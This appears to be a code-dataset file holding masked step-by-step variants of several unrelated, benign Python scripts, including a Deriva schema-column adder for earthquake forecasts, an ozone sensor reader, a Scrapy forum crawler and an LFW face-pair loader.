\"ShakeMapSurfaces\"\n \"ShakeMapSurfaces-noSpont-full_td-scale1.14\"\n not null\n \"\"\"\n tabname.create_column(Column.define('Sim_Start_Time', builtin_types.\n text, comment='Simulation Start Time'))\n tabname.create_column(Column.define('Catalog_Mag', builtin_types.text,\n comment='Catalog Name and Event Magnitude'))\n tabname.create_column(Column.define('Event_ID', builtin_types.text,\n comment='Earthquake Event ID'))\n tabname.create_column(Column.define('Post_Event_Date', builtin_types.\n text, comment='Days Forecast made after Mainshock'))\n tabname.create_column(Column.define('Rupture_Definition', builtin_types\n .text, comment='Type of Rupture used in ETAS forecast'))\n print('After Adding Column')\n etas_model = model.schemas['ETAS']\n tabname = etas_model.tables['Forecast']\n for column in tabname.column_definitions:\n print(column.name, column.type.typename, column.nullok)\n sys.exit(0)\n",
"step-3": "<mask token>\nimport os\nimport sys\nfrom deriva.core import DerivaServer, ErmrestCatalog, get_credential\nfrom deriva.chisel import Model, Schema, Table, Column, Key, ForeignKey, builtin_types, tag\nif __name__ == '__main__':\n hostname = 'forecast.derivacloud.org'\n catalog_id = '5'\n model = Model.from_catalog(DerivaServer('https', hostname, credentials=\n get_credential(hostname)).connect_ermrest(catalog_id))\n tabname = model.schemas['ETAS'].tables['Forecast']\n print('Before Adding Column')\n for column in tabname.column_definitions:\n print(column.name, column.type.typename, column.nullok)\n \"\"\"\n Define a series of column names that reflect metadata we expect to extract from\n the ETAS directory names. These are initial names, defined by developers.\n ETAS modelers may want to rename these columns to be more meaningful to domain experts.\n For this first version, all fields are defined as free text.\n Redefinition of these values as controlled vocabularies are a future refinement.\n \n 1) Sim_Start_Time: Enumeration List\n e.g: \"2019_07_16\"\n not null\n \n 2) Catalog_Mag: Enumeration List\n e.g.: \"ComCatM7p1\"\n not null\n \n 3) Event_ID: Enumeration List\n e.g.: \"ci39457511\"\n not null\n \n 4) Post_Event_Date: Enumeration List\n e.g.: \"7DaysAfter\"\n maybe null\n \n 5) Rupture_Def: Enumeration List\n e.g. \"ShakeMapSurfaces\"\n \"ShakeMapSurfaces-noSpont-full_td-scale1.14\"\n not null\n \"\"\"\n tabname.create_column(Column.define('Sim_Start_Time', builtin_types.\n text, comment='Simulation Start Time'))\n tabname.create_column(Column.define('Catalog_Mag', builtin_types.text,\n comment='Catalog Name and Event Magnitude'))\n tabname.create_column(Column.define('Event_ID', builtin_types.text,\n comment='Earthquake Event ID'))\n tabname.create_column(Column.define('Post_Event_Date', builtin_types.\n text, comment='Days Forecast made after Mainshock'))\n tabname.create_column(Column.define('Rupture_Definition', builtin_types\n .text, comment='Type of Rupture used in ETAS forecast'))\n print('After Adding Column')\n etas_model = model.schemas['ETAS']\n tabname = etas_model.tables['Forecast']\n for column in tabname.column_definitions:\n print(column.name, column.type.typename, column.nullok)\n sys.exit(0)\n",
"step-4": "#!/usr/bin/env python\n\n\n\"\"\"add_columns.py: This script reads an SCEC ETAS forecast directory name\nand extracts key fields that are then added as attributes in the SCEC Deriva\nschema.\n\n This script is an example of how the ERD used by Deriva is extended as additional\n information or metadata is added to the asset descriptions in Deriva.\n\n This must be run after the create_model.py script has been run, because this modifies\n the ERD created by that script.\n \n The expectation is this is run once. If it is run a second time, we expect errors\n indicating the columns already exist.\n \nPhilip Maechling\n3 April 2021\n\"\"\"\nimport os\nimport sys\nfrom deriva.core import DerivaServer, ErmrestCatalog, get_credential\nfrom deriva.chisel import Model, Schema, Table, Column, Key, ForeignKey, builtin_types, tag\n\nif __name__ == \"__main__\":\n\n # Connect to server and catalog ------------------------------------------------------------------#\n\n hostname = 'forecast.derivacloud.org' # this is a dev server for throw-away work (change to 'forecast.derivacloud.org)\n catalog_id = '5' # this was a throw-away catalog used to test this script (change to TBD)\n\n model = Model.from_catalog(\n DerivaServer('https', hostname, credentials=get_credential(hostname)).connect_ermrest(catalog_id)\n )\n\n #\n # During testing, exit before any table modifications are done\n #\n\n\n tabname = model.schemas['ETAS'].tables[\"Forecast\"]\n print(\"Before Adding Column\")\n for column in tabname.column_definitions:\n print(column.name,column.type.typename,column.nullok)\n\n \"\"\"\n Define a series of column names that reflect metadata we expect to extract from\n the ETAS directory names. These are initial names, defined by developers.\n ETAS modelers may want to rename these columns to be more meaningful to domain experts.\n For this first version, all fields are defined as free text.\n Redefinition of these values as controlled vocabularies are a future refinement.\n \n 1) Sim_Start_Time: Enumeration List\n e.g: \"2019_07_16\"\n not null\n \n 2) Catalog_Mag: Enumeration List\n e.g.: \"ComCatM7p1\"\n not null\n \n 3) Event_ID: Enumeration List\n e.g.: \"ci39457511\"\n not null\n \n 4) Post_Event_Date: Enumeration List\n e.g.: \"7DaysAfter\"\n maybe null\n \n 5) Rupture_Def: Enumeration List\n e.g. \"ShakeMapSurfaces\"\n \"ShakeMapSurfaces-noSpont-full_td-scale1.14\"\n not null\n \"\"\"\n\n\n tabname.create_column(Column.define('Sim_Start_Time',\n builtin_types.text,\n comment=\"Simulation Start Time\"))\n\n tabname.create_column(Column.define('Catalog_Mag',\n builtin_types.text,\n comment=\"Catalog Name and Event Magnitude\"))\n\n tabname.create_column(Column.define('Event_ID',\n builtin_types.text,\n comment=\"Earthquake Event ID\"))\n\n tabname.create_column(Column.define('Post_Event_Date',\n builtin_types.text,\n comment=\"Days Forecast made after Mainshock\"))\n\n tabname.create_column(Column.define('Rupture_Definition',\n builtin_types.text,\n comment=\"Type of Rupture used in ETAS forecast\"))\n\n # retrieve catalog model again to ensure we reflect latest structural changes\n # example shows this, but I'm not sure what it returns\n print(\"After Adding Column\")\n etas_model = model.schemas['ETAS']\n tabname = etas_model.tables[\"Forecast\"]\n for column in tabname.column_definitions:\n print(column.name,column.type.typename,column.nullok)\n\n sys.exit(0)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
debt = 100
equity = 50
ratio = debt / equity
if ratio <= 2:
print('😊')
else:
print('⚠️')
print('Ratio is', ratio)
|
normal
|
{
"blob_id": "40b1fac14aaa81039aec8e80ce1c91bb881cfe78",
"index": 3474,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif ratio <= 2:\n print('😊')\nelse:\n print('⚠️')\nprint('Ratio is', ratio)\n",
"step-3": "debt = 100\nequity = 50\nratio = debt / equity\nif ratio <= 2:\n print('😊')\nelse:\n print('⚠️')\nprint('Ratio is', ratio)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import tensorflow as tf
def Float32():
return tf.float32
def Float16():
return tf.float16
|
normal
|
{
"blob_id": "c60b8eec57d845c73ee3e00432747d23748c1706",
"index": 9537,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef Float32():\n return tf.float32\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef Float32():\n return tf.float32\n\n\ndef Float16():\n return tf.float16\n",
"step-4": "import tensorflow as tf\n\n\ndef Float32():\n return tf.float32\n\n\ndef Float16():\n return tf.float16\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/python3
# Distributed with a free-will license.
# Use it any way you want, profit or free, provided it fits in the licenses of its associated works.
# ADC121C_MQ131
# This code is designed to work with the ADC121C_I2CGAS_MQ131 I2C Mini Module available from ControlEverything.com.
# https://www.controleverything.com/content/Gas?sku=ADC121C_I2CGAS_MQ131#tabs-0-product_tabset-2
import smbus
import time, datetime
# Get I2C bus
bus = smbus.SMBus(1)
def getOzoneData():
data = bus.read_i2c_block_data(0x50, 0x00, 2)
# Convert the data to 12-bits
raw_adc = (data[0] & 0x0F) * 256 + data[1]
ppm = (1.99 * raw_adc) / 4096.0 + 0.01
return ppm
if __name__ == '__main__':
sampleTime = 1 # seconds
# ADC121C_MQ131 address, 0x50(80)
# Read data back from 0x00(00), 2 bytes
# raw_adc MSB, raw_adc LSB
while True:
data = bus.read_i2c_block_data(0x50, 0x00, 2)
# Convert the data to 12-bits
raw_adc = (data[0] & 0x0F) * 256 + data[1]
ppm = (1.99 * raw_adc) / 4096.0 + 0.01
timestmp = ((str(datetime.datetime.utcnow())).split(' ')[1]).split('.')[0]
time.sleep(sampleTime)
# Output data to screen
print(timestmp, "UTC", "Ozone Concentration : %.2f ppm" %ppm)
|
normal
|
{
"blob_id": "678189ac5b0105c90178647843335f9d4402dc66",
"index": 1416,
"step-1": "<mask token>\n\n\ndef getOzoneData():\n data = bus.read_i2c_block_data(80, 0, 2)\n raw_adc = (data[0] & 15) * 256 + data[1]\n ppm = 1.99 * raw_adc / 4096.0 + 0.01\n return ppm\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef getOzoneData():\n data = bus.read_i2c_block_data(80, 0, 2)\n raw_adc = (data[0] & 15) * 256 + data[1]\n ppm = 1.99 * raw_adc / 4096.0 + 0.01\n return ppm\n\n\nif __name__ == '__main__':\n sampleTime = 1\n while True:\n data = bus.read_i2c_block_data(80, 0, 2)\n raw_adc = (data[0] & 15) * 256 + data[1]\n ppm = 1.99 * raw_adc / 4096.0 + 0.01\n timestmp = str(datetime.datetime.utcnow()).split(' ')[1].split('.')[0]\n time.sleep(sampleTime)\n print(timestmp, 'UTC', 'Ozone Concentration : %.2f ppm' % ppm)\n",
"step-3": "<mask token>\nbus = smbus.SMBus(1)\n\n\ndef getOzoneData():\n data = bus.read_i2c_block_data(80, 0, 2)\n raw_adc = (data[0] & 15) * 256 + data[1]\n ppm = 1.99 * raw_adc / 4096.0 + 0.01\n return ppm\n\n\nif __name__ == '__main__':\n sampleTime = 1\n while True:\n data = bus.read_i2c_block_data(80, 0, 2)\n raw_adc = (data[0] & 15) * 256 + data[1]\n ppm = 1.99 * raw_adc / 4096.0 + 0.01\n timestmp = str(datetime.datetime.utcnow()).split(' ')[1].split('.')[0]\n time.sleep(sampleTime)\n print(timestmp, 'UTC', 'Ozone Concentration : %.2f ppm' % ppm)\n",
"step-4": "import smbus\nimport time, datetime\nbus = smbus.SMBus(1)\n\n\ndef getOzoneData():\n data = bus.read_i2c_block_data(80, 0, 2)\n raw_adc = (data[0] & 15) * 256 + data[1]\n ppm = 1.99 * raw_adc / 4096.0 + 0.01\n return ppm\n\n\nif __name__ == '__main__':\n sampleTime = 1\n while True:\n data = bus.read_i2c_block_data(80, 0, 2)\n raw_adc = (data[0] & 15) * 256 + data[1]\n ppm = 1.99 * raw_adc / 4096.0 + 0.01\n timestmp = str(datetime.datetime.utcnow()).split(' ')[1].split('.')[0]\n time.sleep(sampleTime)\n print(timestmp, 'UTC', 'Ozone Concentration : %.2f ppm' % ppm)\n",
"step-5": "#!/usr/bin/python3\n# Distributed with a free-will license.\n# Use it any way you want, profit or free, provided it fits in the licenses of its associated works.\n# ADC121C_MQ131\n# This code is designed to work with the ADC121C_I2CGAS_MQ131 I2C Mini Module available from ControlEverything.com.\n# https://www.controleverything.com/content/Gas?sku=ADC121C_I2CGAS_MQ131#tabs-0-product_tabset-2\n\nimport smbus\nimport time, datetime\n\n# Get I2C bus\nbus = smbus.SMBus(1)\n\ndef getOzoneData():\n\tdata = bus.read_i2c_block_data(0x50, 0x00, 2)\n\n\t# Convert the data to 12-bits\n\traw_adc = (data[0] & 0x0F) * 256 + data[1]\n\tppm = (1.99 * raw_adc) / 4096.0 + 0.01\n\treturn ppm\n\nif __name__ == '__main__':\n\n\tsampleTime = 1 # seconds\n\n\t# ADC121C_MQ131 address, 0x50(80)\n\t# Read data back from 0x00(00), 2 bytes\n\t# raw_adc MSB, raw_adc LSB\n\twhile True:\n\t\tdata = bus.read_i2c_block_data(0x50, 0x00, 2)\n\n\t\t# Convert the data to 12-bits\n\t\traw_adc = (data[0] & 0x0F) * 256 + data[1]\n\t\tppm = (1.99 * raw_adc) / 4096.0 + 0.01\n\n\t\ttimestmp = ((str(datetime.datetime.utcnow())).split(' ')[1]).split('.')[0]\n\t\ttime.sleep(sampleTime)\n\n\n\t\t# Output data to screen\n\t\tprint(timestmp, \"UTC\", \"Ozone Concentration : %.2f ppm\" %ppm)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
class IndividualStack:
def __init__(self):
self.stack=[None]*5
class StackwithStacks:
def __init__(self):
self.stacks = []
self.stackcount=-1
self.count=0
self.st = None
def push(self, element):
if self.count%5==0:
self.stackcount = self.stackcount+1
self.count=0
self.st=IndividualStack()
self.stacks.append(self.st)
self.st.stack[self.count]=element
self.count = self.count+1
else:
self.st.stack[self.count] = element
self.count = self.count + 1
def pop(self):
if self.count == 1:
self.count=self.count-1
returnval= self.stacks[self.stackcount].stack[self.count]
self.stacks.pop()
self.stackcount=self.stackcount-1
self.count=5
return returnval
else:
self.count = self.count - 1
return self.stacks[self.stackcount].stack[self.count]
st = StackwithStacks()
st.push(1)
st.push(1)
st.push(1)
st.push(1)
st.push(1)
st.push(12)
st.push(13)
st.push(1)
st.push(4)
st.push(7)
st.push(1)
st.push(8)
st.push(1)
st.push(6)
print st.pop()
print st.pop()
print st.pop()
print st.pop()
print st.pop()
print st.pop()
print st.pop()
print st.pop()
|
normal
|
{
"blob_id": "a8f52772522d1efc097c3d17d9c08199816f1168",
"index": 3785,
"step-1": "class IndividualStack:\n def __init__(self):\n self.stack=[None]*5\n\n\nclass StackwithStacks:\n def __init__(self):\n self.stacks = []\n self.stackcount=-1\n self.count=0\n self.st = None\n\n def push(self, element):\n if self.count%5==0:\n self.stackcount = self.stackcount+1\n self.count=0\n self.st=IndividualStack()\n self.stacks.append(self.st)\n self.st.stack[self.count]=element\n self.count = self.count+1\n\n else:\n self.st.stack[self.count] = element\n self.count = self.count + 1\n\n def pop(self):\n if self.count == 1:\n self.count=self.count-1\n returnval= self.stacks[self.stackcount].stack[self.count]\n self.stacks.pop()\n self.stackcount=self.stackcount-1\n self.count=5\n return returnval\n\n else:\n self.count = self.count - 1\n return self.stacks[self.stackcount].stack[self.count]\n\n\nst = StackwithStacks()\n\nst.push(1)\nst.push(1)\nst.push(1)\nst.push(1)\nst.push(1)\nst.push(12)\nst.push(13)\nst.push(1)\nst.push(4)\nst.push(7)\nst.push(1)\nst.push(8)\nst.push(1)\nst.push(6)\n\n\nprint st.pop()\nprint st.pop()\nprint st.pop()\nprint st.pop()\nprint st.pop()\nprint st.pop()\nprint st.pop()\nprint st.pop()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
f = open("resources/yesterday.txt", 'r')
yesterday_lyric = ""
while 1 :
line = f.readline()
if not line :
break
yesterday_lyric = yesterday_lyric + line.strip() + "\n"
f.close()
# 대소문자 구분없이 yesterday 단어의 개수 세기 : 대문자로 또는 소문자로 만들고 카운드 세기
num_of_yesterday = yesterday_lyric.upper().count("YESTERDAY")
print("Number of a Word 'YESTERDAY'", num_of_yesterday)
# 대소문자 구분하여 Yesterday 와 yesterday의 개수를 세보자.
num_of_small_yesterday = yesterday_lyric.count("yesterday")
num_of_title_yesterday = yesterday_lyric.count("Yesterday")
print("Number of a Word 'yesterday'", num_of_small_yesterday)
print("Number of a Word 'Yesterday'", num_of_title_yesterday)
|
normal
|
{
"blob_id": "8559448822b3d3989a9795e7b497a2791588c327",
"index": 9539,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile 1:\n line = f.readline()\n if not line:\n break\n yesterday_lyric = yesterday_lyric + line.strip() + '\\n'\nf.close()\n<mask token>\nprint(\"Number of a Word 'YESTERDAY'\", num_of_yesterday)\n<mask token>\nprint(\"Number of a Word 'yesterday'\", num_of_small_yesterday)\nprint(\"Number of a Word 'Yesterday'\", num_of_title_yesterday)\n",
"step-3": "f = open('resources/yesterday.txt', 'r')\nyesterday_lyric = ''\nwhile 1:\n line = f.readline()\n if not line:\n break\n yesterday_lyric = yesterday_lyric + line.strip() + '\\n'\nf.close()\nnum_of_yesterday = yesterday_lyric.upper().count('YESTERDAY')\nprint(\"Number of a Word 'YESTERDAY'\", num_of_yesterday)\nnum_of_small_yesterday = yesterday_lyric.count('yesterday')\nnum_of_title_yesterday = yesterday_lyric.count('Yesterday')\nprint(\"Number of a Word 'yesterday'\", num_of_small_yesterday)\nprint(\"Number of a Word 'Yesterday'\", num_of_title_yesterday)\n",
"step-4": "f = open(\"resources/yesterday.txt\", 'r')\nyesterday_lyric = \"\"\nwhile 1 :\n line = f.readline()\n if not line :\n break\n yesterday_lyric = yesterday_lyric + line.strip() + \"\\n\"\n\nf.close()\n\n# 대소문자 구분없이 yesterday 단어의 개수 세기 : 대문자로 또는 소문자로 만들고 카운드 세기\nnum_of_yesterday = yesterday_lyric.upper().count(\"YESTERDAY\")\nprint(\"Number of a Word 'YESTERDAY'\", num_of_yesterday)\n\n# 대소문자 구분하여 Yesterday 와 yesterday의 개수를 세보자.\nnum_of_small_yesterday = yesterday_lyric.count(\"yesterday\")\nnum_of_title_yesterday = yesterday_lyric.count(\"Yesterday\")\nprint(\"Number of a Word 'yesterday'\", num_of_small_yesterday)\nprint(\"Number of a Word 'Yesterday'\", num_of_title_yesterday)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#! /usr/bin python3
# -*- coding: utf-8 -*-
from scrapy import Request
from scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor
from scrapy.spiders import CrawlSpider
from scrapy.spiders import Rule
from xici_bbs.spiders.author import get_author_item
from xici_bbs.spiders.comment import get_comment_list, get_comment_next_page
from xici_bbs.spiders.post import get_post_item
class XiciSpider(CrawlSpider):
name = 'xici'
start_urls = ['http://www.xici.net']
post_extract = LxmlLinkExtractor(
allow=(
'/d\d+.htm',
),
allow_domains=(
'xici.net'
),
# deny=(
#
# ),
deny_domains=(
'account.xici.net',
)
)
author_extract = LxmlLinkExtractor(
allow=(
'/u\d+$',
'/u\d+/$',
),
allow_domains=(
'xici.net',
),
# deny=(
#
# ),
deny_domains=(
'account.xici.net',
)
)
follow_extract = LxmlLinkExtractor(
# allow=(
# '/s/[0-9]+',
# ),
allow_domains=(
'xici.net',
),
deny=(
'/help/',
),
deny_domains=(
'account.xici.net',
# 'life.xici.net',
)
)
rules = (
Rule(author_extract, follow=True, callback='parse_author'),
Rule(post_extract, follow=True, callback='parse_post'),
# Rule(follow_extract, follow=True, callback='parse_follow'),
Rule(follow_extract, follow=True),
)
# a_count = 0
# p_count = 0
# f_count = 0
def parse_author(self, response):
# self.a_count += 1
# print('author: ', self.a_count, ' ', response.url)
author_item = get_author_item(response)
yield author_item
def parse_post(self, response):
# self.p_count += 1
# print('post: ', self.p_count, ' ', response.url)
post_item = get_post_item(response)
for item_or_request in self.parse_comment(response, post_item):
yield item_or_request
# def parse_follow(self, response):
# self.f_count += 1
# print('follow: ', self.f_count, ' ', response.url)
def parse_comment(self, response, post_item=None):
if not post_item:
post_item = response.meta['post_item']
for comment_item in get_comment_list(response):
post_item['comment_ids'].append(comment_item['comment_id'])
yield comment_item
comment_next_page = get_comment_next_page(response)
if comment_next_page:
yield Request(
url=comment_next_page,
callback=self.parse_comment,
meta={
'post_item': post_item,
}
)
else:
yield post_item
|
normal
|
{
"blob_id": "f1eaba91e27dc063f3decd7b6a4fe4e40f7ed721",
"index": 7948,
"step-1": "<mask token>\n\n\nclass XiciSpider(CrawlSpider):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def parse_author(self, response):\n author_item = get_author_item(response)\n yield author_item\n\n def parse_post(self, response):\n post_item = get_post_item(response)\n for item_or_request in self.parse_comment(response, post_item):\n yield item_or_request\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass XiciSpider(CrawlSpider):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def parse_author(self, response):\n author_item = get_author_item(response)\n yield author_item\n\n def parse_post(self, response):\n post_item = get_post_item(response)\n for item_or_request in self.parse_comment(response, post_item):\n yield item_or_request\n\n def parse_comment(self, response, post_item=None):\n if not post_item:\n post_item = response.meta['post_item']\n for comment_item in get_comment_list(response):\n post_item['comment_ids'].append(comment_item['comment_id'])\n yield comment_item\n comment_next_page = get_comment_next_page(response)\n if comment_next_page:\n yield Request(url=comment_next_page, callback=self.\n parse_comment, meta={'post_item': post_item})\n else:\n yield post_item\n",
"step-3": "<mask token>\n\n\nclass XiciSpider(CrawlSpider):\n name = 'xici'\n start_urls = ['http://www.xici.net']\n post_extract = LxmlLinkExtractor(allow=('/d\\\\d+.htm',), allow_domains=\n 'xici.net', deny_domains=('account.xici.net',))\n author_extract = LxmlLinkExtractor(allow=('/u\\\\d+$', '/u\\\\d+/$'),\n allow_domains=('xici.net',), deny_domains=('account.xici.net',))\n follow_extract = LxmlLinkExtractor(allow_domains=('xici.net',), deny=(\n '/help/',), deny_domains=('account.xici.net',))\n rules = Rule(author_extract, follow=True, callback='parse_author'), Rule(\n post_extract, follow=True, callback='parse_post'), Rule(follow_extract,\n follow=True)\n\n def parse_author(self, response):\n author_item = get_author_item(response)\n yield author_item\n\n def parse_post(self, response):\n post_item = get_post_item(response)\n for item_or_request in self.parse_comment(response, post_item):\n yield item_or_request\n\n def parse_comment(self, response, post_item=None):\n if not post_item:\n post_item = response.meta['post_item']\n for comment_item in get_comment_list(response):\n post_item['comment_ids'].append(comment_item['comment_id'])\n yield comment_item\n comment_next_page = get_comment_next_page(response)\n if comment_next_page:\n yield Request(url=comment_next_page, callback=self.\n parse_comment, meta={'post_item': post_item})\n else:\n yield post_item\n",
"step-4": "from scrapy import Request\nfrom scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor\nfrom scrapy.spiders import CrawlSpider\nfrom scrapy.spiders import Rule\nfrom xici_bbs.spiders.author import get_author_item\nfrom xici_bbs.spiders.comment import get_comment_list, get_comment_next_page\nfrom xici_bbs.spiders.post import get_post_item\n\n\nclass XiciSpider(CrawlSpider):\n name = 'xici'\n start_urls = ['http://www.xici.net']\n post_extract = LxmlLinkExtractor(allow=('/d\\\\d+.htm',), allow_domains=\n 'xici.net', deny_domains=('account.xici.net',))\n author_extract = LxmlLinkExtractor(allow=('/u\\\\d+$', '/u\\\\d+/$'),\n allow_domains=('xici.net',), deny_domains=('account.xici.net',))\n follow_extract = LxmlLinkExtractor(allow_domains=('xici.net',), deny=(\n '/help/',), deny_domains=('account.xici.net',))\n rules = Rule(author_extract, follow=True, callback='parse_author'), Rule(\n post_extract, follow=True, callback='parse_post'), Rule(follow_extract,\n follow=True)\n\n def parse_author(self, response):\n author_item = get_author_item(response)\n yield author_item\n\n def parse_post(self, response):\n post_item = get_post_item(response)\n for item_or_request in self.parse_comment(response, post_item):\n yield item_or_request\n\n def parse_comment(self, response, post_item=None):\n if not post_item:\n post_item = response.meta['post_item']\n for comment_item in get_comment_list(response):\n post_item['comment_ids'].append(comment_item['comment_id'])\n yield comment_item\n comment_next_page = get_comment_next_page(response)\n if comment_next_page:\n yield Request(url=comment_next_page, callback=self.\n parse_comment, meta={'post_item': post_item})\n else:\n yield post_item\n",
"step-5": "#! /usr/bin python3\n# -*- coding: utf-8 -*-\nfrom scrapy import Request\nfrom scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor\nfrom scrapy.spiders import CrawlSpider\nfrom scrapy.spiders import Rule\n\nfrom xici_bbs.spiders.author import get_author_item\nfrom xici_bbs.spiders.comment import get_comment_list, get_comment_next_page\nfrom xici_bbs.spiders.post import get_post_item\n\n\nclass XiciSpider(CrawlSpider):\n name = 'xici'\n\n start_urls = ['http://www.xici.net']\n\n post_extract = LxmlLinkExtractor(\n allow=(\n '/d\\d+.htm',\n ),\n allow_domains=(\n 'xici.net'\n ),\n # deny=(\n #\n # ),\n deny_domains=(\n 'account.xici.net',\n )\n )\n\n author_extract = LxmlLinkExtractor(\n allow=(\n '/u\\d+$',\n '/u\\d+/$',\n ),\n allow_domains=(\n 'xici.net',\n ),\n # deny=(\n #\n # ),\n deny_domains=(\n 'account.xici.net',\n )\n )\n\n follow_extract = LxmlLinkExtractor(\n # allow=(\n # '/s/[0-9]+',\n # ),\n allow_domains=(\n 'xici.net',\n ),\n deny=(\n '/help/',\n ),\n deny_domains=(\n 'account.xici.net',\n # 'life.xici.net',\n )\n )\n\n rules = (\n Rule(author_extract, follow=True, callback='parse_author'),\n Rule(post_extract, follow=True, callback='parse_post'),\n # Rule(follow_extract, follow=True, callback='parse_follow'),\n Rule(follow_extract, follow=True),\n )\n\n # a_count = 0\n # p_count = 0\n # f_count = 0\n\n def parse_author(self, response):\n # self.a_count += 1\n # print('author: ', self.a_count, ' ', response.url)\n author_item = get_author_item(response)\n\n yield author_item\n\n def parse_post(self, response):\n # self.p_count += 1\n # print('post: ', self.p_count, ' ', response.url)\n post_item = get_post_item(response)\n\n for item_or_request in self.parse_comment(response, post_item):\n yield item_or_request\n\n # def parse_follow(self, response):\n # self.f_count += 1\n # print('follow: ', self.f_count, ' ', response.url)\n\n def parse_comment(self, response, post_item=None):\n if not post_item:\n post_item = response.meta['post_item']\n\n for comment_item in get_comment_list(response):\n post_item['comment_ids'].append(comment_item['comment_id'])\n\n yield comment_item\n\n comment_next_page = get_comment_next_page(response)\n if comment_next_page:\n yield Request(\n url=comment_next_page,\n callback=self.parse_comment,\n meta={\n 'post_item': post_item,\n }\n )\n\n else:\n yield post_item\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
fileName = str(input("Please write the name of the file you would like to open: "))
file_handle = open(fileName, "w")
contents = str(input("Please write the content you would like to save."))
file_handle.write(contents)
file_handle.close()
print(contents)
|
normal
|
{
"blob_id": "aed09a3c04f284fa0b8844a47c5bc9d1621a9b5f",
"index": 2034,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfile_handle.write(contents)\nfile_handle.close()\nprint(contents)\n",
"step-3": "fileName = str(input(\n 'Please write the name of the file you would like to open: '))\nfile_handle = open(fileName, 'w')\ncontents = str(input('Please write the content you would like to save.'))\nfile_handle.write(contents)\nfile_handle.close()\nprint(contents)\n",
"step-4": "fileName = str(input(\"Please write the name of the file you would like to open: \"))\n\nfile_handle = open(fileName, \"w\")\ncontents = str(input(\"Please write the content you would like to save.\"))\nfile_handle.write(contents)\nfile_handle.close()\nprint(contents)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
umur = raw_input("Berapakah umurmu?")
tinggi = raw_input("Berapakah tinggimu?")
berat = raw_input("Berapa beratmu?")
print "Jadi, umurmu adalah %r, tinggumu %r, dan beratmu %r." % (umur, tinggi, berat)
|
normal
|
{
"blob_id": "7d2335c956776fc5890a727d22540eabf2ea4b94",
"index": 5862,
"step-1": "umur = raw_input(\"Berapakah umurmu?\")\ntinggi = raw_input(\"Berapakah tinggimu?\")\nberat = raw_input(\"Berapa beratmu?\")\n\nprint \"Jadi, umurmu adalah %r, tinggumu %r, dan beratmu %r.\" % (umur, tinggi, berat)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import os
import config as cfg
import numpy as np
class lfwdata():
def __init__(self):
self._pairs = []
pairs = open(os.path.join(cfg.LFW_IMAGEPATH, '../pairs.txt'))
pairs.readline()
for pair in pairs:
pair = pair.split()
if len(pair) == 3:
img1 = os.path.join(
pair[0], pair[0] + '_{:04d}.jpg'.format(int(pair[1])))
img2 = os.path.join(
pair[0], pair[0] + '_{:04d}.jpg'.format(int(pair[2])))
label = True
elif len(pair) == 4:
img1 = os.path.join(
pair[0], pair[0] + '_{:04d}.jpg'.format(int(pair[1])))
img2 = os.path.join(
pair[2], pair[2] + '_{:04d}.jpg'.format(int(pair[3])))
label = False
else:
assert False, pair
self._pairs.append({'img': [img1, img2], 'label': label})
print('Number of pairs: {}'.format(len(self._pairs)))
if __name__ == '__main__':
pairs = lfwdata()
|
normal
|
{
"blob_id": "ccdd7a5e0a1de75762530a7cadd919a2ee753d18",
"index": 1758,
"step-1": "<mask token>\n\n\nclass lfwdata:\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass lfwdata:\n\n def __init__(self):\n self._pairs = []\n pairs = open(os.path.join(cfg.LFW_IMAGEPATH, '../pairs.txt'))\n pairs.readline()\n for pair in pairs:\n pair = pair.split()\n if len(pair) == 3:\n img1 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[1])))\n img2 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[2])))\n label = True\n elif len(pair) == 4:\n img1 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[1])))\n img2 = os.path.join(pair[2], pair[2] + '_{:04d}.jpg'.format\n (int(pair[3])))\n label = False\n else:\n assert False, pair\n self._pairs.append({'img': [img1, img2], 'label': label})\n print('Number of pairs: {}'.format(len(self._pairs)))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass lfwdata:\n\n def __init__(self):\n self._pairs = []\n pairs = open(os.path.join(cfg.LFW_IMAGEPATH, '../pairs.txt'))\n pairs.readline()\n for pair in pairs:\n pair = pair.split()\n if len(pair) == 3:\n img1 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[1])))\n img2 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[2])))\n label = True\n elif len(pair) == 4:\n img1 = os.path.join(pair[0], pair[0] + '_{:04d}.jpg'.format\n (int(pair[1])))\n img2 = os.path.join(pair[2], pair[2] + '_{:04d}.jpg'.format\n (int(pair[3])))\n label = False\n else:\n assert False, pair\n self._pairs.append({'img': [img1, img2], 'label': label})\n print('Number of pairs: {}'.format(len(self._pairs)))\n\n\nif __name__ == '__main__':\n pairs = lfwdata()\n",
